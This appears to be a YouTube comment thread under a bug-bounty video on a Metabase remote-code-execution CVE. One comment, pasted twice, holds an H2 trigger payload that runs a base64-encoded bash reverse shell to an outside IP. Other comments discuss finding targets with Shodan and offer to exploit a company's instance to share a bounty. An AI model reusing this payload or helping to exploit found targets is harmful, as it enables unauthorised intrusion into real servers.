@@abhishekmorla1 I always got the below error when trying to execute the command. could you please help? or can I consider this as an enough proof of concept for the vulnerability? "Error creating or initializing trigger \"PWNSHELL\" object, class \"..source..\", cause: \"org.h2.message.DbException: Syntax error in SQL statement \"\"//javascript java.lang.Runtime.getRuntime().exec('bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEuMS4xLjEvOTk5OCAwPiYx}|{base64,-d}|{bash,-i}') \"\" [42000-197]\"; see root cause for details; SQL statement: SET TRACE_LEVEL_SYSTEM_OUT 1;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript java.lang.Runtime.getRuntime().exec('bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEuMS4xLjEvOTk5OCAwPiYx}|{base64,-d}|{bash,-i}') $$--=x [90043-197]"
@@abhishekmorla1 History ? Like the school subject ? What history Edit: I know nothing about metabase so i guess to understand the payload I gotta understand Metabase
im beginner if im not wrong i understand you found SSRF and u esclate it to RCE by acccess some metadata or sentsive files and u got RCE ? what advccie you give me
bro if im not wrong, he actually finds some kind of newly discovered (or old idk) CVE, posted on Exploit db or other websites, and then search for those vulnerable services, but i have some questions as well, like, if he only does this to websites that is subscribed to bug bounty services
one day im gonna have the same skills as you, great job mate!!
Great video thanks for sharing
Awesome man ! keep it up. Keep up with the good work !
Appreciate it!
Metabase cve 2023 awesome 🙌
Keep it bro doing great work by teacher other ❤ love from Ronin
Thanks pro!
Could you please paste the full POST request on setup/validate endpoint which you have used ?
Perhaps you can join the channel
@@abhishekmorla1
I always got the below error when trying to execute the command. could you please help? or can I consider this as an enough proof of concept for the vulnerability?
"Error creating or initializing trigger \"PWNSHELL\" object, class \"..source..\", cause: \"org.h2.message.DbException: Syntax error in SQL statement \"\"//javascript
java.lang.Runtime.getRuntime().exec('bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEuMS4xLjEvOTk5OCAwPiYx}|{base64,-d}|{bash,-i}')
\"\" [42000-197]\"; see root cause for details; SQL statement:
SET TRACE_LEVEL_SYSTEM_OUT 1;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript
java.lang.Runtime.getRuntime().exec('bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEuMS4xLjEvOTk5OCAwPiYx}|{base64,-d}|{bash,-i}')
$$--=x [90043-197]"
Hats off Bro!!!
Is that all your findings that you upload?
No but most of them
How you got these api endpoints with this json parameter and know it will be vulnerable to RCE ?!
History
@@abhishekmorla1 History ? Like the school subject ? What history
Edit: I know nothing about metabase so i guess to understand the payload I gotta understand Metabase
@@Noctuu bro burp history
@@abhishekmorla1 and the payload too i guess ? Or my edit was right ?
Solid af
Very cool.
nice finding
im beginner if im not wrong i understand you found SSRF and u esclate it to RCE by acccess some metadata or sentsive files and u got RCE ? what advccie you give me
bro if im not wrong, he actually finds some kind of newly discovered (or old idk) CVE, posted on Exploit db or other websites, and then search for those vulnerable services, but i have some questions as well, like, if he only does this to websites that is subscribed to bug bounty services
join to learn more ruclips.net/channel/UC9IAh1JN4lhSVz193GvZVZgjoin
how to find these kind of bugs can you make a proper tut. on it how to find this type of RCE
sure
great video, but it should be watch at x0.50 speed
perfect+++
How do you find targets for such bugs? Any methodology you follow?
I use shodan
@@abhishekmorla1I'll do same concept in web application based signin page? it'll work?
bro help me exploit this
we can share bounty
found metabase in billiom dollar company
join the channel ruclips.net/channel/UC9IAh1JN4lhSVz193GvZVZgjoin
@@abhishekmorla1 I don't think there's any need to join the channel
U wanna hunt together that cve then reply
Bro informative video, how you leran this type of bugs?
from cves
Cool one....may i get this exploit for mysql and postgress
And why did you add some extra space in the base64 encoded one still confused there
To remove the equal
@@abhishekmorla1 yeah I seen but why did u do that already it's encoded right ? I have doubt in this
🎉🎉🎉❤❤❤
bro ur just amazing hacker . do u guess the endpoint on all requests?
Naah bro..😅
@@abhishekmorla1 Then why do u always copy Endpoint and paste it directly into burp ? i really need to know bro
Bro study about the cve i mentioned
Congratulations, found the video from WhatsApp
May I know what kind of laptop you would recommend for bug bounty programs
it's CVE-2023-38646
dont copy paste the title
@@abhishekmorla1 it wasn't there before i commented
How to find this program? I think it's not hackerone program.right?
Nope its nof h1 bro